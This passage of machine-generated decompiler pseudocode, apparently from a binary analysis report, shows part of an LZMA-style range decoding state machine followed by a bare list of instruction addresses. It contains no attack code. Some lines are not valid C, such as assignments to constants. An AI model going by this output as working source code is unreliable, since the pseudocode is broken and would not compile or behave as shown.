                                                                                                                          							_v40 = _v44;
                                                                                                                          							L91:
                                                                                                                          							__ecx = _v48;
                                                                                                                          							_v48 = __eax;
                                                                                                                          							_v44 = _v48;
                                                                                                                          							L92:
                                                                                                                          							__eax = _v8;
                                                                                                                          							_v132 = 0x15;
                                                                                                                          							__eax = _v8 + 0xa68;
                                                                                                                          							_v92 = _v8 + 0xa68;
                                                                                                                          							goto L71;
                                                                                                                          						case 0xc:
                                                                                                                          							L102:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								_v140 = 0xc;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							__ecx = _v116;
                                                                                                                          							__eax = _v16;
                                                                                                                          							_v20 = _v20 << 8;
                                                                                                                          							__ecx =  *_v116 & 0x000000ff;
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							_t340 =  &_v116;
                                                                                                                          							 *_t340 = _v116 + 1;
                                                                                                                          							__eflags =  *_t340;
                                                                                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							__eax = _v48;
                                                                                                                          							goto L104;
                                                                                                                          						case 0xd:
                                                                                                                          							L39:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								_v140 = 0xd;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							__ecx = _v116;
                                                                                                                          							__eax = _v16;
                                                                                                                          							_v20 = _v20 << 8;
                                                                                                                          							__ecx =  *_v116 & 0x000000ff;
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							_t127 =  &_v116;
                                                                                                                          							 *_t127 = _v116 + 1;
                                                                                                                          							__eflags =  *_t127;
                                                                                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							L41:
                                                                                                                          							__eax = _v68;
                                                                                                                          							__eflags = _v76 - _v68;
                                                                                                                          							if(_v76 != _v68) {
                                                                                                                          								goto L50;
                                                                                                                          							}
                                                                                                                          							__eflags = __ebx - 0x100;
                                                                                                                          							if(__ebx >= 0x100) {
                                                                                                                          								goto L56;
                                                                                                                          							}
                                                                                                                          							L43:
                                                                                                                          							__eax = _v95 & 0x000000ff;
                                                                                                                          							_v95 = _v95 << 1;
                                                                                                                          							__ecx = _v92;
                                                                                                                          							__eax = (_v95 & 0x000000ff) >> 7;
                                                                                                                          							_v76 = __eax;
                                                                                                                          							__eax = __eax + 1;
                                                                                                                          							__eax = __eax << 8;
                                                                                                                          							__eax = __eax + __ebx;
                                                                                                                          							__esi = _v92 + __eax * 2;
                                                                                                                          							_v20 = _v20 >> 0xb;
                                                                                                                          							__ax =  *__esi;
                                                                                                                          							_v88 = __esi;
                                                                                                                          							__edx = __ax & 0x0000ffff;
                                                                                                                          							__ecx = (_v20 >> 0xb) * __edx;
                                                                                                                          							__eflags = _v16 - __ecx;
                                                                                                                          							if(_v16 >= __ecx) {
                                                                                                                          								_v20 = _v20 - __ecx;
                                                                                                                          								_v16 = _v16 - __ecx;
                                                                                                                          								__cx = __ax;
                                                                                                                          								_v68 = 1;
                                                                                                                          								__cx = __ax >> 5;
                                                                                                                          								__eflags = __eax;
                                                                                                                          								__ebx = __ebx + __ebx + 1;
                                                                                                                          								 *__esi = __ax;
                                                                                                                          							} else {
                                                                                                                          								_v68 = _v68 & 0x00000000;
                                                                                                                          								_v20 = __ecx;
                                                                                                                          								0x800 = 0x800 - __edx;
                                                                                                                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                          								__ebx = __ebx + __ebx;
                                                                                                                          								 *__esi = __cx;
                                                                                                                          							}
                                                                                                                          							__eflags = _v20 - 0x1000000;
                                                                                                                          							_v72 = __ebx;
                                                                                                                          							if(_v20 >= 0x1000000) {
                                                                                                                          								goto L41;
                                                                                                                          							} else {
                                                                                                                          								goto L39;
                                                                                                                          							}
                                                                                                                          						case 0xe:
                                                                                                                          							L48:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								_v140 = 0xe;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							__ecx = _v116;
                                                                                                                          							__eax = _v16;
                                                                                                                          							_v20 = _v20 << 8;
                                                                                                                          							__ecx =  *_v116 & 0x000000ff;
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							_t161 =  &_v116;
                                                                                                                          							 *_t161 = _v116 + 1;
                                                                                                                          							__eflags =  *_t161;
                                                                                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							while(1) {
                                                                                                                          								L50:
                                                                                                                          								__eflags = __ebx - 0x100;
                                                                                                                          								if(__ebx >= 0x100) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								__eax = _v92;
                                                                                                                          								__edx = __ebx + __ebx;
                                                                                                                          								__ecx = _v20;
                                                                                                                          								__esi = __edx + __eax;
                                                                                                                          								__ecx = _v20 >> 0xb;
                                                                                                                          								__ax =  *__esi;
                                                                                                                          								_v88 = __esi;
                                                                                                                          								__edi = __ax & 0x0000ffff;
                                                                                                                          								__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                          								__eflags = _v16 - __ecx;
                                                                                                                          								if(_v16 >= __ecx) {
                                                                                                                          									_v20 = _v20 - __ecx;
                                                                                                                          									_v16 = _v16 - __ecx;
                                                                                                                          									__cx = __ax;
                                                                                                                          									_t175 = __edx + 1; // 0x1
                                                                                                                          									__ebx = _t175;
                                                                                                                          									__cx = __ax >> 5;
                                                                                                                          									__eflags = __eax;
                                                                                                                          									 *__esi = __ax;
                                                                                                                          								} else {
                                                                                                                          									_v20 = __ecx;
                                                                                                                          									0x800 = 0x800 - __edi;
                                                                                                                          									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          									__ebx = __ebx + __ebx;
                                                                                                                          									 *__esi = __cx;
                                                                                                                          								}
                                                                                                                          								__eflags = _v20 - 0x1000000;
                                                                                                                          								_v72 = __ebx;
                                                                                                                          								if(_v20 >= 0x1000000) {
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									goto L48;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							L56:
                                                                                                                          							_t178 =  &_v56;
                                                                                                                          							 *_t178 = _v56 & 0x00000000;
                                                                                                                          							__eflags =  *_t178;
                                                                                                                          							goto L57;
                                                                                                                          						case 0xf:
                                                                                                                          							L60:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								_v140 = 0xf;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							__ecx = _v116;
                                                                                                                          							__eax = _v16;
                                                                                                                          							_v20 = _v20 << 8;
                                                                                                                          							__ecx =  *_v116 & 0x000000ff;
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							_t208 =  &_v116;
                                                                                                                          							 *_t208 = _v116 + 1;
                                                                                                                          							__eflags =  *_t208;
                                                                                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							L62:
                                                                                                                          							__eflags = __ebx - 0x100;
                                                                                                                          							if(__ebx >= 0x100) {
                                                                                                                          								L57:
                                                                                                                          								__al = _v72;
                                                                                                                          								_v96 = _v72;
                                                                                                                          								goto L58;
                                                                                                                          							}
                                                                                                                          							L63:
                                                                                                                          							__eax = _v92;
                                                                                                                          							__edx = __ebx + __ebx;
                                                                                                                          							__ecx = _v20;
                                                                                                                          							__esi = __edx + __eax;
                                                                                                                          							__ecx = _v20 >> 0xb;
                                                                                                                          							__ax =  *__esi;
                                                                                                                          							_v88 = __esi;
                                                                                                                          							__edi = __ax & 0x0000ffff;
                                                                                                                          							__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                          							__eflags = _v16 - __ecx;
                                                                                                                          							if(_v16 >= __ecx) {
                                                                                                                          								_v20 = _v20 - __ecx;
                                                                                                                          								_v16 = _v16 - __ecx;
                                                                                                                          								__cx = __ax;
                                                                                                                          								_t222 = __edx + 1; // 0x1
                                                                                                                          								__ebx = _t222;
                                                                                                                          								__cx = __ax >> 5;
                                                                                                                          								__eflags = __eax;
                                                                                                                          								 *__esi = __ax;
                                                                                                                          							} else {
                                                                                                                          								_v20 = __ecx;
                                                                                                                          								0x800 = 0x800 - __edi;
                                                                                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          								__ebx = __ebx + __ebx;
                                                                                                                          								 *__esi = __cx;
                                                                                                                          							}
                                                                                                                          							__eflags = _v20 - 0x1000000;
                                                                                                                          							_v72 = __ebx;
                                                                                                                          							if(_v20 >= 0x1000000) {
                                                                                                                          								goto L62;
                                                                                                                          							} else {
                                                                                                                          								goto L60;
                                                                                                                          							}
                                                                                                                          						case 0x10:
                                                                                                                          							L112:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								_v140 = 0x10;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							__ecx = _v116;
                                                                                                                          							__eax = _v16;
                                                                                                                          							_v20 = _v20 << 8;
                                                                                                                          							__ecx =  *_v116 & 0x000000ff;
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							_t371 =  &_v116;
                                                                                                                          							 *_t371 = _v116 + 1;
                                                                                                                          							__eflags =  *_t371;
                                                                                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							goto L114;
                                                                                                                          						case 0x11:
                                                                                                                          							L71:
                                                                                                                          							__esi = _v92;
                                                                                                                          							_v136 = 0x12;
                                                                                                                          							goto L135;
                                                                                                                          						case 0x12:
                                                                                                                          							__eflags = _v68;
                                                                                                                          							if(_v68 != 0) {
                                                                                                                          								__eax = _v92;
                                                                                                                          								_v136 = 0x13;
                                                                                                                          								__esi = _v92 + 2;
                                                                                                                          								L135:
                                                                                                                          								_v88 = _t626;
                                                                                                                          								goto L136;
                                                                                                                          							}
                                                                                                                          							__eax = _v80;
                                                                                                                          							_v52 = _v52 & 0x00000000;
                                                                                                                          							__ecx = _v92;
                                                                                                                          							__eax = _v80 << 4;
                                                                                                                          							__eflags = __eax;
                                                                                                                          							__eax = _v92 + __eax + 4;
                                                                                                                          							goto L133;
                                                                                                                          						case 0x13:
                                                                                                                          							__eflags = _v68;
                                                                                                                          							if(_v68 != 0) {
                                                                                                                          								_t475 =  &_v92;
                                                                                                                          								 *_t475 = _v92 + 0x204;
                                                                                                                          								__eflags =  *_t475;
                                                                                                                          								_v52 = 0x10;
                                                                                                                          								_v68 = 8;
                                                                                                                          								L147:
                                                                                                                          								_v128 = 0x14;
                                                                                                                          								goto L148;
                                                                                                                          							}
                                                                                                                          							__eax = _v80;
                                                                                                                          							__ecx = _v92;
                                                                                                                          							__eax = _v80 << 4;
                                                                                                                          							_v52 = 8;
                                                                                                                          							__eax = _v92 + (_v80 << 4) + 0x104;
                                                                                                                          							L133:
                                                                                                                          							_v92 = __eax;
                                                                                                                          							_v68 = 3;
                                                                                                                          							goto L147;
                                                                                                                          						case 0x14:
                                                                                                                          							_v52 = _v52 + __ebx;
                                                                                                                          							__eax = _v132;
                                                                                                                          							goto L143;
                                                                                                                          						case 0x15:
                                                                                                                          							__eax = 0;
                                                                                                                          							__eflags = _v60 - 7;
                                                                                                                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          							__al = __al & 0x000000fd;
                                                                                                                          							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          							goto L123;
                                                                                                                          						case 0x16:
                                                                                                                          							__eax = _v52;
                                                                                                                          							__eflags = __eax - 4;
                                                                                                                          							if(__eax >= 4) {
                                                                                                                          								_push(3);
                                                                                                                          								_pop(__eax);
                                                                                                                          							}
                                                                                                                          							__ecx = _v8;
                                                                                                                          							_v68 = 6;
                                                                                                                          							__eax = __eax << 7;
                                                                                                                          							_v128 = 0x19;
                                                                                                                          							_v92 = __eax;
                                                                                                                          							goto L148;
                                                                                                                          						case 0x17:
                                                                                                                          							L148:
                                                                                                                          							__eax = _v68;
                                                                                                                          							_v84 = 1;
                                                                                                                          							_v76 = _v68;
                                                                                                                          							goto L152;
                                                                                                                          						case 0x18:
                                                                                                                          							L149:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								_v140 = 0x18;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							__ecx = _v116;
                                                                                                                          							__eax = _v16;
                                                                                                                          							_v20 = _v20 << 8;
                                                                                                                          							__ecx =  *_v116 & 0x000000ff;
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							_t490 =  &_v116;
                                                                                                                          							 *_t490 = _v116 + 1;
                                                                                                                          							__eflags =  *_t490;
                                                                                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							L151:
                                                                                                                          							_t493 =  &_v76;
                                                                                                                          							 *_t493 = _v76 - 1;
                                                                                                                          							__eflags =  *_t493;
                                                                                                                          							L152:
                                                                                                                          							__eflags = _v76;
                                                                                                                          							if(_v76 <= 0) {
                                                                                                                          								__ecx = _v68;
                                                                                                                          								__ebx = _v84;
                                                                                                                          								0 = 1;
                                                                                                                          								__eax = 1 << __cl;
                                                                                                                          								__ebx = _v84 - (1 << __cl);
                                                                                                                          								__eax = _v128;
                                                                                                                          								_v72 = __ebx;
                                                                                                                          								L143:
                                                                                                                          								_v140 = _t561;
                                                                                                                          								goto L3;
                                                                                                                          							}
                                                                                                                          							__eax = _v84;
                                                                                                                          							_v20 = _v20 >> 0xb;
                                                                                                                          							__edx = _v84 + _v84;
                                                                                                                          							__eax = _v92;
                                                                                                                          							__esi = __edx + __eax;
                                                                                                                          							_v88 = __esi;
                                                                                                                          							__ax =  *__esi;
                                                                                                                          							__edi = __ax & 0x0000ffff;
                                                                                                                          							__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                          							__eflags = _v16 - __ecx;
                                                                                                                          							if(_v16 >= __ecx) {
                                                                                                                          								_v20 = _v20 - __ecx;
                                                                                                                          								_v16 = _v16 - __ecx;
                                                                                                                          								__cx = __ax;
                                                                                                                          								__cx = __ax >> 5;
                                                                                                                          								__eax = __eax - __ecx;
                                                                                                                          								__edx = __edx + 1;
                                                                                                                          								__eflags = __edx;
                                                                                                                          								 *__esi = __ax;
                                                                                                                          								_v84 = __edx;
                                                                                                                          							} else {
                                                                                                                          								_v20 = __ecx;
                                                                                                                          								0x800 = 0x800 - __edi;
                                                                                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          								_v84 = _v84 << 1;
                                                                                                                          								 *__esi = __cx;
                                                                                                                          							}
                                                                                                                          							__eflags = _v20 - 0x1000000;
                                                                                                                          							if(_v20 >= 0x1000000) {
                                                                                                                          								goto L151;
                                                                                                                          							} else {
                                                                                                                          								goto L149;
                                                                                                                          							}
                                                                                                                          						case 0x19:
                                                                                                                          							__eflags = __ebx - 4;
                                                                                                                          							if(__ebx < 4) {
                                                                                                                          								_v48 = __ebx;
                                                                                                                          								L122:
                                                                                                                          								_t399 =  &_v48;
                                                                                                                          								 *_t399 = _v48 + 1;
                                                                                                                          								__eflags =  *_t399;
                                                                                                                          								L123:
                                                                                                                          								__eax = _v48;
                                                                                                                          								__eflags = __eax;
                                                                                                                          								if(__eax == 0) {
                                                                                                                          									_v52 = _v52 | 0xffffffff;
                                                                                                                          									goto L173;
                                                                                                                          								}
                                                                                                                          								__eflags = __eax - _v100;
                                                                                                                          								if(__eax > _v100) {
                                                                                                                          									goto L174;
                                                                                                                          								}
                                                                                                                          								_v52 = _v52 + 2;
                                                                                                                          								__eax = _v52;
                                                                                                                          								_t406 =  &_v100;
                                                                                                                          								 *_t406 = _v100 + _v52;
                                                                                                                          								__eflags =  *_t406;
                                                                                                                          								goto L126;
                                                                                                                          							}
                                                                                                                          							__ecx = __ebx;
                                                                                                                          							__eax = __ebx;
                                                                                                                          							__ecx = __ebx >> 1;
                                                                                                                          							__eax = __ebx & 0x00000001;
                                                                                                                          							__ecx = (__ebx >> 1) - 1;
                                                                                                                          							__al = __al | 0x00000002;
                                                                                                                          							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                          							__eflags = __ebx - 0xe;
                                                                                                                          							_v48 = __eax;
                                                                                                                          							if(__ebx >= 0xe) {
                                                                                                                          								__ebx = 0;
                                                                                                                          								_v76 = __ecx;
                                                                                                                          								L105:
                                                                                                                          								__eflags = _v76;
                                                                                                                          								if(_v76 <= 0) {
                                                                                                                          									__eax = __eax + __ebx;
                                                                                                                          									_v68 = 4;
                                                                                                                          									_v48 = __eax;
                                                                                                                          									__eax = _v8;
                                                                                                                          									__eax = _v8 + 0x644;
                                                                                                                          									__eflags = __eax;
                                                                                                                          									L111:
                                                                                                                          									__ebx = 0;
                                                                                                                          									_v92 = __eax;
                                                                                                                          									_v84 = 1;
                                                                                                                          									_v72 = 0;
                                                                                                                          									_v76 = 0;
                                                                                                                          									L115:
                                                                                                                          									__eax = _v68;
                                                                                                                          									__eflags = _v76 - _v68;
                                                                                                                          									if(_v76 >= _v68) {
                                                                                                                          										_t397 =  &_v48;
                                                                                                                          										 *_t397 = _v48 + __ebx;
                                                                                                                          										__eflags =  *_t397;
                                                                                                                          										goto L122;
                                                                                                                          									}
                                                                                                                          									__eax = _v84;
                                                                                                                          									_v20 = _v20 >> 0xb;
                                                                                                                          									__edi = _v84 + _v84;
                                                                                                                          									__eax = _v92;
                                                                                                                          									__esi = __edi + __eax;
                                                                                                                          									_v88 = __esi;
                                                                                                                          									__ax =  *__esi;
                                                                                                                          									__ecx = __ax & 0x0000ffff;
                                                                                                                          									__edx = (_v20 >> 0xb) * __ecx;
                                                                                                                          									__eflags = _v16 - __edx;
                                                                                                                          									if(_v16 >= __edx) {
                                                                                                                          										__ecx = 0;
                                                                                                                          										_v20 = _v20 - __edx;
                                                                                                                          										__ecx = 1;
                                                                                                                          										_v16 = _v16 - __edx;
                                                                                                                          										__ebx = 1;
                                                                                                                          										__ecx = _v76;
                                                                                                                          										__ebx = 1 << __cl;
                                                                                                                          										__ecx = 1 << __cl;
                                                                                                                          										__ebx = _v72;
                                                                                                                          										__ebx = _v72 | __ecx;
                                                                                                                          										__cx = __ax;
                                                                                                                          										__cx = __ax >> 5;
                                                                                                                          										__eax = __eax - __ecx;
                                                                                                                          										__edi = __edi + 1;
                                                                                                                          										__eflags = __edi;
                                                                                                                          										_v72 = __ebx;
                                                                                                                          										 *__esi = __ax;
                                                                                                                          										_v84 = __edi;
                                                                                                                          									} else {
                                                                                                                          										_v20 = __edx;
                                                                                                                          										0x800 = 0x800 - __ecx;
                                                                                                                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                          										_v84 = _v84 << 1;
                                                                                                                          										 *__esi = __dx;
                                                                                                                          									}
                                                                                                                          									__eflags = _v20 - 0x1000000;
                                                                                                                          									if(_v20 >= 0x1000000) {
                                                                                                                          										L114:
                                                                                                                          										_t374 =  &_v76;
                                                                                                                          										 *_t374 = _v76 + 1;
                                                                                                                          										__eflags =  *_t374;
                                                                                                                          										goto L115;
                                                                                                                          									} else {
                                                                                                                          										goto L112;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								__ecx = _v16;
                                                                                                                          								__ebx = __ebx + __ebx;
                                                                                                                          								_v20 = _v20 >> 1;
                                                                                                                          								__eflags = _v16 - _v20;
                                                                                                                          								_v72 = __ebx;
                                                                                                                          								if(_v16 >= _v20) {
                                                                                                                          									__ecx = _v20;
                                                                                                                          									_v16 = _v16 - _v20;
                                                                                                                          									__ebx = __ebx | 0x00000001;
                                                                                                                          									__eflags = __ebx;
                                                                                                                          									_v72 = __ebx;
                                                                                                                          								}
                                                                                                                          								__eflags = _v20 - 0x1000000;
                                                                                                                          								if(_v20 >= 0x1000000) {
                                                                                                                          									L104:
                                                                                                                          									_t344 =  &_v76;
                                                                                                                          									 *_t344 = _v76 - 1;
                                                                                                                          									__eflags =  *_t344;
                                                                                                                          									goto L105;
                                                                                                                          								} else {
                                                                                                                          									goto L102;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							__edx = _v8;
                                                                                                                          							__eax = __eax - __ebx;
                                                                                                                          							_v68 = __ecx;
                                                                                                                          							__eax = _v8 + 0x55e + __eax * 2;
                                                                                                                          							goto L111;
                                                                                                                          						case 0x1a:
                                                                                                                          							L58:
                                                                                                                          							__eflags = _v104;
                                                                                                                          							if(_v104 == 0) {
                                                                                                                          								_v140 = 0x1a;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							__ecx = _v108;
                                                                                                                          							__al = _v96;
                                                                                                                          							__edx = _v12;
                                                                                                                          							_v100 = _v100 + 1;
                                                                                                                          							_v108 = _v108 + 1;
                                                                                                                          							_v104 = _v104 - 1;
                                                                                                                          							 *_v108 = __al;
                                                                                                                          							__ecx = _v24;
                                                                                                                          							 *(_v12 + __ecx) = __al;
                                                                                                                          							__eax = __ecx + 1;
                                                                                                                          							__edx = 0;
                                                                                                                          							_t197 = __eax % _v120;
                                                                                                                          							__eax = __eax / _v120;
                                                                                                                          							__edx = _t197;
                                                                                                                          							goto L82;
                                                                                                                          						case 0x1b:
                                                                                                                          							L78:
                                                                                                                          							__eflags = _v104;
                                                                                                                          							if(_v104 == 0) {
                                                                                                                          								_v140 = 0x1b;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							__eax = _v24;
                                                                                                                          							__eax = _v24 - _v48;
                                                                                                                          							__eflags = __eax - _v120;
                                                                                                                          							if(__eax >= _v120) {
                                                                                                                          								__eax = __eax + _v120;
                                                                                                                          								__eflags = __eax;
                                                                                                                          							}
                                                                                                                          							__edx = _v12;
                                                                                                                          							__cl =  *(__edx + __eax);
                                                                                                                          							__eax = _v24;
                                                                                                                          							_v96 = __cl;
                                                                                                                          							 *(__edx + __eax) = __cl;
                                                                                                                          							__eax = __eax + 1;
                                                                                                                          							__edx = 0;
                                                                                                                          							_t280 = __eax % _v120;
                                                                                                                          							__eax = __eax / _v120;
                                                                                                                          							__edx = _t280;
                                                                                                                          							__eax = _v108;
                                                                                                                          							_v100 = _v100 + 1;
                                                                                                                          							_v108 = _v108 + 1;
                                                                                                                          							_t289 =  &_v104;
                                                                                                                          							 *_t289 = _v104 - 1;
                                                                                                                          							__eflags =  *_t289;
                                                                                                                          							 *_v108 = __cl;
                                                                                                                          							L82:
                                                                                                                          							_v24 = __edx;
                                                                                                                          							goto L83;
                                                                                                                          						case 0x1c:
                                                                                                                          							while(1) {
                                                                                                                          								L126:
                                                                                                                          								__eflags = _v104;
                                                                                                                          								if(_v104 == 0) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								__eax = _v24;
                                                                                                                          								__eax = _v24 - _v48;
                                                                                                                          								__eflags = __eax - _v120;
                                                                                                                          								if(__eax >= _v120) {
                                                                                                                          									__eax = __eax + _v120;
                                                                                                                          									__eflags = __eax;
                                                                                                                          								}
                                                                                                                          								__edx = _v12;
                                                                                                                          								__cl =  *(__edx + __eax);
                                                                                                                          								__eax = _v24;
                                                                                                                          								_v96 = __cl;
                                                                                                                          								 *(__edx + __eax) = __cl;
                                                                                                                          								__eax = __eax + 1;
                                                                                                                          								__edx = 0;
                                                                                                                          								_t420 = __eax % _v120;
                                                                                                                          								__eax = __eax / _v120;
                                                                                                                          								__edx = _t420;
                                                                                                                          								__eax = _v108;
                                                                                                                          								_v108 = _v108 + 1;
                                                                                                                          								_v104 = _v104 - 1;
                                                                                                                          								_v52 = _v52 - 1;
                                                                                                                          								__eflags = _v52;
                                                                                                                          								 *_v108 = __cl;
                                                                                                                          								_v24 = _t420;
                                                                                                                          								if(_v52 > 0) {
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									L83:
                                                                                                                          									_v140 = 2;
                                                                                                                          									goto L3;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							_v140 = 0x1c;
                                                                                                                          							L173:
                                                                                                                          							_push(0x22);
                                                                                                                          							_pop(_t574);
                                                                                                                          							memcpy(_v148,  &_v140, _t574 << 2);
                                                                                                                          							return 0;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				L174:
                                                                                                                          				_t538 = _t537 | 0xffffffff;
                                                                                                                          				return _t538;
                                                                                                                          			}










































                                                                                                                          0x00406bc0
                                                                                                                          0x00406bc7
                                                                                                                          0x00406bcd
                                                                                                                          0x00406bd3
                                                                                                                          0x00000000
                                                                                                                          0x00406bd7
                                                                                                                          0x00406be3
                                                                                                                          0x00406be3
                                                                                                                          0x00406be3
                                                                                                                          0x00406bec
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406bf2
                                                                                                                          0x00000000
                                                                                                                          0x00406bf9
                                                                                                                          0x00406bfd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406c06
                                                                                                                          0x00406c09
                                                                                                                          0x00406c0c
                                                                                                                          0x00406c0e
                                                                                                                          0x00406c10
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406c16
                                                                                                                          0x00406c19
                                                                                                                          0x00406c1b
                                                                                                                          0x00406c1c
                                                                                                                          0x00406c1f
                                                                                                                          0x00406c21
                                                                                                                          0x00406c22
                                                                                                                          0x00406c24
                                                                                                                          0x00406c27
                                                                                                                          0x00406c2c
                                                                                                                          0x00406c31
                                                                                                                          0x00406c3a
                                                                                                                          0x00406c4d
                                                                                                                          0x00406c50
                                                                                                                          0x00406c59
                                                                                                                          0x00406c5c
                                                                                                                          0x00406c84
                                                                                                                          0x00406c84
                                                                                                                          0x00406c86
                                                                                                                          0x00406c94
                                                                                                                          0x00406c94
                                                                                                                          0x00406c98
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406c88
                                                                                                                          0x00406c88
                                                                                                                          0x00406c8b
                                                                                                                          0x00406c8b
                                                                                                                          0x00406c8c
                                                                                                                          0x00406c8c
                                                                                                                          0x00000000
                                                                                                                          0x00406c88
                                                                                                                          0x00406c5e
                                                                                                                          0x00406c62
                                                                                                                          0x00406c67
                                                                                                                          0x00406c67
                                                                                                                          0x00406c70
                                                                                                                          0x00406c76
                                                                                                                          0x00406c78
                                                                                                                          0x00406c7b
                                                                                                                          0x00000000
                                                                                                                          0x00406c81
                                                                                                                          0x00406c81
                                                                                                                          0x00000000
                                                                                                                          0x00406c81
                                                                                                                          0x00000000
                                                                                                                          0x00406c9e
                                                                                                                          0x00406c9e
                                                                                                                          0x00406ca2
                                                                                                                          0x0040754e
                                                                                                                          0x00000000
                                                                                                                          0x0040754e
                                                                                                                          0x00406cab
                                                                                                                          0x00406cbb
                                                                                                                          0x00406cbe
                                                                                                                          0x00406cc1
                                                                                                                          0x00406cc1
                                                                                                                          0x00406cc1
                                                                                                                          0x00406cc4
                                                                                                                          0x00406cc4
                                                                                                                          0x00406cc8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406cca
                                                                                                                          0x00406ccd
                                                                                                                          0x00406cd0
                                                                                                                          0x00406cfa
                                                                                                                          0x00406d00
                                                                                                                          0x00406d07
                                                                                                                          0x00000000
                                                                                                                          0x00406d07
                                                                                                                          0x00406cd2
                                                                                                                          0x00406cd6
                                                                                                                          0x00406cd9
                                                                                                                          0x00406cde
                                                                                                                          0x00406cde
                                                                                                                          0x00406ce9
                                                                                                                          0x00406cef
                                                                                                                          0x00406cf1
                                                                                                                          0x00406cf4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406d39
                                                                                                                          0x00406d3f
                                                                                                                          0x00406d42
                                                                                                                          0x00406d4f
                                                                                                                          0x00406d57
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406d0e
                                                                                                                          0x00406d0e
                                                                                                                          0x00406d12
                                                                                                                          0x0040755d
                                                                                                                          0x00000000
                                                                                                                          0x0040755d
                                                                                                                          0x00406d1e
                                                                                                                          0x00406d29
                                                                                                                          0x00406d29
                                                                                                                          0x00406d29
                                                                                                                          0x00406d2c
                                                                                                                          0x00406d2f
                                                                                                                          0x00406d32
                                                                                                                          0x00406d35
                                                                                                                          0x00406d37
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004073ce
                                                                                                                          0x004073ce
                                                                                                                          0x004073d4
                                                                                                                          0x004073da
                                                                                                                          0x004073dd
                                                                                                                          0x004073e0
                                                                                                                          0x004073fa
                                                                                                                          0x004073fd
                                                                                                                          0x00407403
                                                                                                                          0x0040740e
                                                                                                                          0x0040740e
                                                                                                                          0x00407410
                                                                                                                          0x004073e2
                                                                                                                          0x004073e2
                                                                                                                          0x004073f1
                                                                                                                          0x004073f5
                                                                                                                          0x004073f5
                                                                                                                          0x00407413
